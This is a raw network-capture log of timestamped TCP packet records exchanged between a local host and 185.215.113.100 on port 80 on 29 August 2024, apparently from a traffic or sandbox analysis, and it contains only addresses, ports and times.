Aug 29, 2024 15:42:58.011179924 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011192083 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011210918 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011224031 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011225939 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011236906 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011272907 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011272907 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011274099 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011287928 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011295080 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011315107 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011351109 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011396885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011410952 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011421919 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011434078 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011440992 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011445999 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011459112 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011471987 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011471987 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011471987 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011487007 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011512995 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011512995 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011531115 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011553049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011564970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011567116 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011567116 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011575937 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011591911 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011615992 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011667967 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011682034 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011693001 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011706114 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011704922 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011734009 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011765003 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011846066 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011858940 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011869907 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011879921 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011890888 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011893034 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011905909 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011909008 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011918068 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011929035 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011939049 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011941910 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011974096 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011976004 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011976004 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.011985064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.011995077 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012033939 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.012033939 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.012067080 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012079000 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012089968 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012101889 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012101889 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.012113094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012125969 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012147903 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.012160063 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.012197018 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012207031 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012254953 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.012254953 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.012284994 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012298107 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012309074 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012317896 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012326002 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.012331963 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012336969 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.012347937 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012401104 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.012506962 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.012551069 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012562037 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012573004 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012583971 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012594938 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012599945 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.012608051 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012619019 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012629032 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.012639999 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.012639999 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.012794971 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.013644934 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.013689995 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.013693094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.013706923 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.013740063 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.013744116 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.013756990 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.013762951 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.013833046 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.013849020 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.013863087 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.013863087 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.013876915 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.013887882 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.013900042 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.013902903 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.013911009 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.013942957 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.013955116 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.013957024 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.013957024 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.013964891 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014000893 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014023066 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014034033 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014045954 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014075041 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014116049 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014158964 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014169931 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014179945 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014190912 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014200926 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014203072 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014213085 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014225006 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014239073 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014246941 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014264107 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014288902 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014297962 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014307976 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014318943 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014332056 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014347076 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014347076 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014386892 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014420986 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014431953 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014441967 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014456034 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014473915 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014475107 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014494896 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014506102 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014516115 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014527082 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014565945 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014565945 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014759064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014770031 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014780045 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014802933 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014805079 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014858961 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014862061 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014862061 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014909029 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014910936 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014923096 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.014961958 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014961958 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.014995098 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.015007973 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.015018940 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.015029907 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.015049934 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.015049934 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.015083075 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.015093088 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.015104055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.015114069 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.015135050 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.015185118 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098005056 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098046064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098058939 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098067999 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098083973 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098094940 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098103046 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098103046 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098105907 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098118067 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098134041 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098159075 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098170042 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098174095 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098174095 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098182917 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098193884 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098203897 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098206997 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098253965 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098253965 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098287106 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098298073 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098306894 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098318100 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098329067 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098340034 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098350048 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098350048 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098371029 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098406076 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098417044 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098427057 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098438978 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098450899 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098467112 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098467112 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098503113 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098546982 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098556995 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098577023 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098582983 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098594904 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098606110 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098608971 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098618031 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098628998 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098638058 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098638058 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098643064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098655939 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098661900 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098669052 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098679066 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098680973 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098728895 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098728895 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098779917 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098788977 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098853111 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098885059 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098895073 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098903894 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098917007 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098923922 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098927975 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.098961115 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.098975897 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.099003077 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099014997 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099024057 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099034071 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099056959 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.099056959 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.099067926 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099077940 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099081039 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.099087954 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099102020 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099123955 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.099150896 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.099163055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099173069 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099181890 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099222898 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.099224091 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.099296093 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099308014 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099317074 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099325895 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099338055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099345922 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099354982 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.099356890 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099368095 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099380016 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.099380016 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099380016 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.099402905 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099421978 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.099445105 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.099461079 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099469900 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.099474907 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099484921 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.099517107 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.099517107 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.100816965 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.100868940 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.100879908 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.100907087 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.100917101 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.100925922 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.100929022 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.100945950 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.100965023 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.101018906 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101031065 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101038933 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101051092 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101073027 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.101073027 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.101104021 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.101119995 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101130009 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101139069 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101150036 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101176977 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.101248026 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.101286888 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101298094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101305962 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101315975 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101327896 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101330996 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.101339102 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101349115 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101350069 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.101371050 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101383924 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101397991 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101398945 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.101398945 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.101428986 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.101433992 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101454973 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101466894 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101474047 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.101474047 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.101478100 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101490974 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.101495028 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.101509094 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.101532936 CEST	49704	80	192.168.2.5	185.215.113.100
